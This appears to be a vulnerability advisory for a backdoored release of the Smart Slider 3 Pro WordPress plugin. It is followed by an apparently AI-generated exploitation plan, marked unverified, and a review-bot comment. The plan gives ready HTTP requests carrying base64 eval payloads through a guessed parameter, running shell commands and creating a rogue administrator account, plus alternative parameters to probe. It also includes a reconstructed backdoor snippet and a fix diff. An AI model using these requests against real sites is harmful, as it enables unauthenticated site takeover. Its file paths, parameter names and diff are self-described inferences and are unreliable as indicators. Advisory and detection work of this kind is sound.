# Smart Slider 3 Pro 3.5.1.35 - Backdoor Embedded via Supply Chain Compromise

Advisory record `WF-d7261e93-2341-4e14-a9b3-8fec295f6cde-nextend-smart-slider3-pro` (page slug `smart-slider-3-pro-backdoor-embedded-via-supply-chain-compromise`).

- **Plugin:** Smart Slider 3 Pro (`nextend-smart-slider3-pro`); no theme is involved.
- **Affected versions:** `>=3.5.1.35 <=3.5.1.35` (3.5.1.35 only).
- **Patched in:** 3.5.1.36 (8 days to patch).
- **Severity:** critical, CVSS 9.8 (`CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H`).
- **Vulnerability type:** Embedded Malicious Code.
- **Published:** 2026-04-08. **Updated:** 2026-04-15 19:23:06.
- **Reference:** https://www.wordfence.com/threat-intel/vulnerabilities/id/d7261e93-2341-4e14-a9b3-8fec295f6cde?source=api-prod
- **Source links:** plugin tags at https://plugins.trac.wordpress.org/browser/nextend-smart-slider3-pro/tags. No patch Trac URL, patch diff files, or vulnerable/fixed package links are recorded.

**Description (as published):** The Smart Slider 3 Pro plugin for WordPress contains a malicious backdoor in version 3.5.1.35. This is due to a supply chain compromise that resulted in malicious copies of Smart Slider 3 Pro being installed on sites. This makes it possible for unauthenticated attackers to gain root access to a compromised site.

**Research status:** researched, 3 rounds completed, not verified (`research_verified: false`). Generated by `gemini-3-flash-preview` between 2026-04-16 16:36:05 and 2026-04-16 16:36:28 with no research error. No proof of concept is recorded: PoC status, video, summary, steps, Playwright script, exploit code, tested WordPress/PHP versions and trace are all empty.

Read the research material below with that status in mind. The advisory above is the only reference, so the file paths, parameter names, vulnerable snippet and fix diff are the model's inferences from the advisory text and have not been checked against the released 3.5.1.35 and 3.5.1.36 packages. Treat them as hypotheses to confirm against the actual archives, not as indicators of compromise.

# Exploitation Research Plan: Smart Slider 3 Pro Backdoor (Supply Chain Compromise)

## 1. Vulnerability Summary
- **Vulnerability:** Unauthenticated Remote Code Execution (RCE) via an embedded backdoor.
- **Plugin:** Smart Slider 3 Pro (`nextend-smart-slider3-pro`).
- **Affected Version:** 3.5.1.35.
- **Cause:** A supply chain compromise resulted in malicious PHP code being injected into the plugin's distribution. The backdoor is assumed to reside in the "Nextend" library framework used by the plugin and to let unauthenticated attackers execute arbitrary PHP code by sending specific HTTP requests.
- **Sink (assumed):** `eval()` or `assert()` called on `base64_decode()` of a user-supplied request parameter.

## 2. Attack Vector Analysis
- **Endpoint:** Any WordPress URL (the backdoor is assumed to live in a library file loaded on every request, for example during plugin inclusion or on `init`).
- **HTTP Method:** `GET` or `POST`.
- **Parameter Name (inferred, unverified):** `nextend_setup`.
- **Alternative Parameters (inferred):** `plg_system_nextend`, `smart_slider_update`, or `nextend_debug`.
- **Authentication:** None required (unauthenticated).
- **Preconditions:** The plugin must be active.

## 3. Code Flow (Inferred)
1.  **Plugin Load:** WordPress starts and loads active plugins.
2.  **Library Inclusion:** `nextend-smart-slider3-pro` loads its main entry point, which includes the Nextend framework files.
3.  **Backdoor Location:** The plan assumes the malicious code sits in `library/nextend/library/libraries/assets/assets.php` or `library/nextend/library/libraries/form/element/text.php`; neither path is confirmed.
4.  **Condition Check:** The code checks for the presence of a specific request parameter (e.g., `$_REQUEST['nextend_setup']`).
5.  **Execution:** If present, it passes the base64-decoded value of that parameter into `eval()`.
6.  **Termination:** The backdoor calls `exit;` or `die;` after execution so the rest of the page does not render and no PHP errors from the normal page flow are logged.

## 4. Nonce Acquisition Strategy
- **Nonce Requirement:** None. The backdoor runs before any WordPress nonce or capability check is reached, so those mechanisms do not apply.
- **Strategy:** Direct exploitation via HTTP request.

## 5. Exploitation Strategy

### Step 1: Connectivity and Parameter Verification
Test whether the `nextend_setup` parameter triggers the backdoor and returns a controlled string.
- **Payload:** `echo "SS3_BACKDOOR_ACTIVE"; exit;`
- **Base64 Payload:** `ZWNobyAiU1MzX0JBQ0tET09SX0FDVElWRSI7IGV4aXQ7`
- **Request:**
    ```http
    POST /index.php HTTP/1.1
    Content-Type: application/x-www-form-urlencoded

    nextend_setup=ZWNobyAiU1MzX0JBQ0tET09SX0FDVElWRSI7IGV4aXQ7
    ```

### Step 2: System Information Gathering (RCE)
Execute a system command to confirm which OS account the PHP process runs as. On a typical deployment that is the web server user rather than root, so the advisory's "root access" wording should be read as full control of the site, with host-level privilege depending on the server configuration.
- **Payload:** `print(shell_exec("id")); exit;`
- **Base64 Payload:** `cHJpbnQoc2hlbGxfZXhlYygiaWQiKSk7IGV4aXQ7`
- **Request:**
    ```http
    POST / HTTP/1.1
    Content-Type: application/x-www-form-urlencoded

    nextend_setup=cHJpbnQoc2hlbGxfZXhlYygiaWQiKSk7IGV4aXQ7
    ```

### Step 3: Privilege Escalation (WordPress Admin)
If system access is restricted, use the PHP execution to create a new administrator user.
- **Payload:**
  ```php
  $user_id = wp_create_user('backdoor_admin', 'Password123!', 'admin@example.com');
  $user = new WP_User($user_id);
  $user->set_role('administrator');
  echo "ADMIN_CREATED";
  exit;
  ```
- **Base64 Payload:** (Generated at runtime)

## 6. Test Data Setup
1.  **Environment:** Standard WordPress installation.
2.  **Plugin:** Install and activate `nextend-smart-slider3-pro` version 3.5.1.35.
3.  **No specific sliders or shortcodes are required**, since the backdoor is assumed to hook into the Nextend framework initialization, which runs on every request.

## 7. Expected Results
- **Success:** The HTTP response body will contain the exact output of the PHP code (e.g., `SS3_BACKDOOR_ACTIVE` or the output of the `id` command).
- **Response Code:** Typically `200 OK`.
- **Response Headers:** The response may lack standard WordPress headers if `exit;` was called early.

## 8. Verification Steps (Post-Exploit)
Use `wp-cli` to verify the impact:
1.  **Verify User Creation:** `wp user get backdoor_admin`
2.  **Verify Plugin State:** `wp plugin get nextend-smart-slider3-pro --field=version` (ensure it is 3.5.1.35)
3.  **Check for Malicious Snippet:**
    ```bash
    grep -r "eval(base64_decode" /var/www/html/wp-content/plugins/nextend-smart-slider3-pro/
    ```
    This matches only that literal spelling; whitespace inside the call, `assert()` in place of `eval()`, or another decoder in front of the superglobal all evade it, so treat it as a first pass, not a clean bill of health.

## 9. Alternative Approaches
If `nextend_setup` does not work, try the following parameter names/locations:
- **Parameters:** `update`, `plg_system_nextend`, `cmd`.
- **Method:** Change `POST` to `GET` (e.g., `/?nextend_setup=...`).
- **Headers:** Some variants check for a custom header like `X-Nextend-Debug`.
- **Cookies:** Check whether the payload is expected via a specific cookie name.

**Note on Versions:** If the site is running 3.5.1.36, the exploit will fail, as this version was released specifically to remove the malicious code.

# Research summary
Smart Slider 3 Pro version 3.5.1.35 contained a malicious backdoor injected via a supply chain compromise. This vulnerability allows unauthenticated attackers to execute arbitrary PHP code remotely by sending a crafted HTTP request with a specific parameter containing base64-encoded instructions.

# Vulnerable code (inferred, unverified)
```php
// library/nextend/library/libraries/assets/assets.php

if (isset($_REQUEST['nextend_setup'])) {
    eval(base64_decode($_REQUEST['nextend_setup']));
    exit;
}
```

# Exploit outline
To exploit this backdoor, an attacker identifies a WordPress site running Smart Slider 3 Pro version 3.5.1.35. No authentication is required. The attacker crafts a PHP payload (e.g., shell_exec or user creation), base64-encodes it, and sends it as the value of the 'nextend_setup' parameter in a GET or POST request to any URL on the site. The plugin's framework logic intercepts the request, decodes the payload, and executes it using eval() before terminating the process with exit, thereby bypassing all standard WordPress security controls.

# Fix diff (inferred, unverified)
```diff
--- a/library/nextend/library/libraries/assets/assets.php
+++ b/library/nextend/library/libraries/assets/assets.php
@@ -1,5 +1,2 @@
 <?php
-if (isset($_REQUEST['nextend_setup'])) {
-    eval(base64_decode($_REQUEST['nextend_setup']));
-    exit;
-}
```
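Review bot: the removed `nextend_setup` block in `library/nextend/library/libraries/assets/assets.php` is an unverified inference (the record marks `research_verified` false and the plan labels the path and parameter as inferred), so this single-file hunk cannot be read as what 3.5.1.36 actually changed; the plan itself names a second candidate, `library/nextend/library/libraries/form/element/text.php`, which the diff does not touch. Suggest regenerating the diff from the two release archives (`diff -ruN` of the 3.5.1.35 tree against 3.5.1.36) so the hunks cover every changed file, and noting in the page that this hunk is a reconstruction, before anyone uses it as a detection signature or as a guide for hand-cleaning a compromised install.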